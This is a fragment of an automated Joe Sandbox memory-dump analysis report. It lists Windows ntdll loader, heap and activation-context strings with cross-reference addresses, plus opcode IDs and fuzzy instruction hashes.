                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0190855E
                                                                      • LdrpInitializeProcess, xrefs: 01908422
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01908421
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                      Strings
                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019421D9, 019422B1
                                                                      • .Local, xrefs: 019028D8
                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019422B6
                                                                      • SXS: %s() passed the empty activation context, xrefs: 019421DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                      Strings
                                                                      • RtlDeactivateActivationContext, xrefs: 01943425, 01943432, 01943451
                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01943437
                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01943456
                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0194342A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                      Strings
                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01931028
                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019310AE
                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01930FE5
                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0193106B
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                      • API String ID: 0-1468400865
                                                                      Strings
                                                                      • LdrpDynamicShimModule, xrefs: 0193A998
                                                                      • apphelp.dll, xrefs: 018F2462
                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0193A992
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0193A9A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-176724104
                                                                      Strings
                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 018E327D
                                                                      • HEAP[%wZ]: , xrefs: 018E3255
                                                                      • HEAP: , xrefs: 018E3264
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                      • API String ID: 0-617086771
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-4253913091
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $@
                                                                      • API String ID: 0-1077428164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                      • API String ID: 0-2779062949
                                                                      Strings
                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0193A10F
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0193A121
                                                                      • LdrpCheckModule, xrefs: 0193A117
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-161242083
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-1334570610
                                                                      Strings
                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 019482DE
                                                                      • Failed to reallocate the system dirs string !, xrefs: 019482D7
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 019482E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-1783798831
                                                                      Strings
                                                                      • @, xrefs: 0198C1F1
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0198C1C5
                                                                      • PreferredUILanguages, xrefs: 0198C212
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                      • API String ID: 0-2968386058
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                      • API String ID: 0-1373925480
                                                                      Strings
                                                                      • LdrpCheckRedirection, xrefs: 0195488F
                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01954888
                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01954899
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                      • API String ID: 0-3154609507
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                      • API String ID: 0-2558761708
                                                                      Strings
                                                                      • Process initialization failed with status 0x%08lx, xrefs: 019520F3
                                                                      • LdrpInitializationFailure, xrefs: 019520FA
                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01952104
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2986994758
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: #%u
                                                                      • API String ID: 48624451-232158463
                                                                      Strings
                                                                      • LdrResSearchResource Enter, xrefs: 018DAA13
                                                                      • LdrResSearchResource Exit, xrefs: 018DAA25
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                      • API String ID: 0-4066393604
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$MUI
                                                                      • API String ID: 0-17815947
                                                                      Strings
                                                                      • kLsE, xrefs: 018D0540
                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018D063D
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                      • API String ID: 0-2547482624
                                                                      Strings
                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 018DA2FB
                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 018DA309
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                      • API String ID: 0-2876891731
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Cleanup Group$Threadpool!
                                                                      • API String ID: 2994545307-4008356553
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: MUI
                                                                      • API String ID: 0-1339004836
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: GlobalTags
                                                                      • API String ID: 0-1106856819
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .mui
                                                                      • API String ID: 0-1199573805
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EXT-
                                                                      • API String ID: 0-1948896318
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: t+P
                                                                      • API String ID: 0-1706847591
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      Strings
                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0195895E
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                      • API String ID: 0-702105204
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction ID: a97b5d51820c6675779f79660281132f8afebbfd5bd7bd71f99e3912f054b832
                                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                      • Instruction Fuzzy Hash: A4F16071E0021A9BDB15DF99D580BAFBBF9AF48714F04812EEA05EB341E774DA41CB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da11c39a974f5d71eb582a9cdcaae0094f8a8059262790d2352f0071ccdbd915
                                                                      • Instruction ID: 0d61feef412c1714016f2d3ad6c98b243e9ac2842fa3758c1470ddce0af727f8
                                                                      • Opcode Fuzzy Hash: da11c39a974f5d71eb582a9cdcaae0094f8a8059262790d2352f0071ccdbd915
                                                                      • Instruction Fuzzy Hash: 66D10071E0070A9BDF05CF69C841ABEB7F9AF88304F18856AD959E7241E739E9018B70
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06ae59c35ef41d285a002ef7d20099174eebedaed3f2667f4f6b3b6a581a0bb4
                                                                      • Instruction ID: e79a23dd3b45e4cebff14edbba49baf2dd862769f39d8f5fc903b2ee95df2169
                                                                      • Opcode Fuzzy Hash: 06ae59c35ef41d285a002ef7d20099174eebedaed3f2667f4f6b3b6a581a0bb4
                                                                      • Instruction Fuzzy Hash: 00E1A071508349DFC715CF28C080A6ABBE0FF89318F158A6DE999C7351EB31EA05CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8810a3e046b70528a2b626800ae7e4bbafcc73deebd66e5a2461ea8b43f91da4
                                                                      • Instruction ID: 4097d3d85add28cd564706d5ba95018a685b04017bfdaf56d9239cdeacfcbbe3
                                                                      • Opcode Fuzzy Hash: 8810a3e046b70528a2b626800ae7e4bbafcc73deebd66e5a2461ea8b43f91da4
                                                                      • Instruction Fuzzy Hash: 9ED1F471A4021A9BDB14DF28C880FBAB7E5FF55B18F04462DE91ADB284E734EA50CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                      • Instruction ID: b1c13502cd7db6f2f3d2c336602825044f5c1ece610815712bb34798a7c6f3a3
                                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                      • Instruction Fuzzy Hash: 08B17474A00605AFDB64DF9AC940EABBFB9FF84344F10445DAE46A7791DA34E906CB10
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                      • Instruction ID: 1cdff36a27271a65bdcb49267495d5de7e114ffb047d8db4156dc06905992c0f
                                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                      • Instruction Fuzzy Hash: 4BB15A3170064A9FDB21DBA8C844BBEBBF6AF85304F290555E55AE7381D770EE41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b8c884e4208c3ffdc482793b37a9113c27282ec942a81fe798538bf72e44c4e
                                                                      • Instruction ID: fe1c5c8d50a03748ad7ca923c04af8843f0380d1bb3b2132d2839fa73ba25a19
                                                                      • Opcode Fuzzy Hash: 7b8c884e4208c3ffdc482793b37a9113c27282ec942a81fe798538bf72e44c4e
                                                                      • Instruction Fuzzy Hash: B6C147746083418FE764CF19C494BAAB7F5FF88304F44496DE98987291E774EA48CF92
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9aa026f2678d90afde81af3870ebc97e67792a6ce7cc75e32e20ac205615b2a5
                                                                      • Instruction ID: ac748faabf02c2b19a807148667c1c3cc2bcc2654c5cbbfaeda48521914022ac
                                                                      • Opcode Fuzzy Hash: 9aa026f2678d90afde81af3870ebc97e67792a6ce7cc75e32e20ac205615b2a5
                                                                      • Instruction Fuzzy Hash: 35B16F71A0026A8BDB24DF68C890BA9B3B5FF54704F0485EDE50EE7645EB34DE85CB21
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de088924d0f68c45212955401cb78d23a468dd79ef0b81270583ae0d6edd0285
                                                                      • Instruction ID: 5a1a8d9c28df47863fe3d16b64ad28906076bfed04fdd7383251b97730b4dd47
                                                                      • Opcode Fuzzy Hash: de088924d0f68c45212955401cb78d23a468dd79ef0b81270583ae0d6edd0285
                                                                      • Instruction Fuzzy Hash: 40A11971E002599FEB21DB5CC844FAEBBB4BF41714F060169EB05EB2A1D7789E40CB92
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c17a11667981055fe855f1c7228618c7dbc356a62f3e7b11404d87bf885e9b53
                                                                      • Instruction ID: eb7cf00b61024d62e2730e94831150ddc36c73143e6940c5853beae13511dfcf
                                                                      • Opcode Fuzzy Hash: c17a11667981055fe855f1c7228618c7dbc356a62f3e7b11404d87bf885e9b53
                                                                      • Instruction Fuzzy Hash: 1CA11670B0060A9FDB25CF69C890BAAB7B5FF54715F084429FA4DD7285EB35E891CB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 65f1e11b49178aedbfa1bb4151045b1e154c2e735b33919d47ec316bc5f03899
                                                                      • Instruction ID: 8d8f47c5573521c276c014ebc1f08a0506ab7678e594f799c89ff2c94b804902
                                                                      • Opcode Fuzzy Hash: 65f1e11b49178aedbfa1bb4151045b1e154c2e735b33919d47ec316bc5f03899
                                                                      • Instruction Fuzzy Hash: 82A1CF72A04252DFC721DF18C980B2ABBE9FF59744F890928E589DB651D3B4ED04CBD2
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23b2ae4969f2ac20c12e4be4af3ac530bc0a6efe9c62a2fe81cd1dcfcbe702b7
                                                                      • Instruction ID: 17bb482f2ec9e2def16d1b34deba356855fb204d30c2458a1d54442db5574cdf
                                                                      • Opcode Fuzzy Hash: 23b2ae4969f2ac20c12e4be4af3ac530bc0a6efe9c62a2fe81cd1dcfcbe702b7
                                                                      • Instruction Fuzzy Hash: 7091C371E0021AAFDB51CF68D884BBEBFB9AF49710F554159EA04FB341D734EA008BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8cbf0322466b554f9915440598f469933ae2d488a5322744a4d42af1f2659ecd
                                                                      • Instruction ID: 01398397d9180a802c12e64745dd52196cdff416b71bc1318fa1a18355478ba1
                                                                      • Opcode Fuzzy Hash: 8cbf0322466b554f9915440598f469933ae2d488a5322744a4d42af1f2659ecd
                                                                      • Instruction Fuzzy Hash: 08912531A0061ACBEB24DB6CC488B7A7BE5EFD6718F054069E949DB380F674DE01C752
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8c754219f53a552b6f6356bec33eda8452dcb5b6224056ea56383b201d5ed39e
                                                                      • Instruction ID: 9d419e036964ee6baba88cfad6ff38f93a181cccbcd05d973a50969227d0b028
                                                                      • Opcode Fuzzy Hash: 8c754219f53a552b6f6356bec33eda8452dcb5b6224056ea56383b201d5ed39e
                                                                      • Instruction Fuzzy Hash: 2C81B871E0062A9FDB14DF69C840ABEBBF9FB48700F14852EE959D7644E334D940CBA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                      • Instruction ID: fa4fc76f53afbb6ea19ca15547211b8580f30938aa55210eaafb6947e4070e77
                                                                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                      • Instruction Fuzzy Hash: 9A818171A0025A9FDF19CF9DC480AAEBBF6FF84311F188569D91AAB344E734E901CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43222275b26d510ac39f9f4608d98362fe1084944cf037eba03d178a55353fd0
                                                                      • Instruction ID: 51121559a2d9b6792efdeb568128d72f1fa465d879bb32e2c6e465c9269097a8
                                                                      • Opcode Fuzzy Hash: 43222275b26d510ac39f9f4608d98362fe1084944cf037eba03d178a55353fd0
                                                                      • Instruction Fuzzy Hash: 99813071A00609AFDB26DFA9C880FEEBBF9FF88354F144829E559A7250D730AD45CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07d4ae3ffeed3e4c8960962f6ff70d616b13da82030c3b28057d0f19f4e62e15
